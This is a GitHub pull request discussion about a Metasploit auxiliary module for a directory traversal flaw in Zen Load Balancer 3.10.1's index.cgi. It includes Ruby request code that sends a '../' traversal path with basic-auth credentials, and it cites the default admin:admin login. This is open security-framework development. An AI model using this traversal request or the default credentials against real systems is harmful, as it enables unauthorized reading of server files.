-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal #13235
Conversation
Thank you @wvu-r7 & @space-r7 for reviewing it. I got stuck here could either of you please help for what went wrong. def run_host(ip)
filename = datastore['FILEPATH']
traversal = "../" * datastore['DEPTH'] << filename
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, datastore['REPO'], '/index.cgi?id=2-3&filelog='),
'vars_get' => {'path' => traversal},
'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
}, 25)
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end Or would it be |
Your problem is you have a URI that includes
then
assuming there is no other magic happening that would make this not work... |
Thank you @h00die, I tried the below code but didn't work res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, datastore['REPO'], 'index.cgi'),
'vars_get'=> {
'path' => traversal,
'id' => '2-3',
'filelog' => '',
'nlines' => '100',
'action' => 'See+logs'
},
'authorization' => basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
}, 25) |
ah, that was slightly confusing since you had
|
Looks good to me! Thanks, @RootUp! |
Tested:
|
Release NotesA new auxiliary module, |
Summary
Verification
As per the documentation to access the administration panel of zen load balancer the default username and password is
admin:admin
Reference: https://www.zevenet.com/knowledge-base/community-edition/community-edition-v3-05-administration-guide/community-edition-v3-05-access-to-zen-load-balacer-web-administration-panel/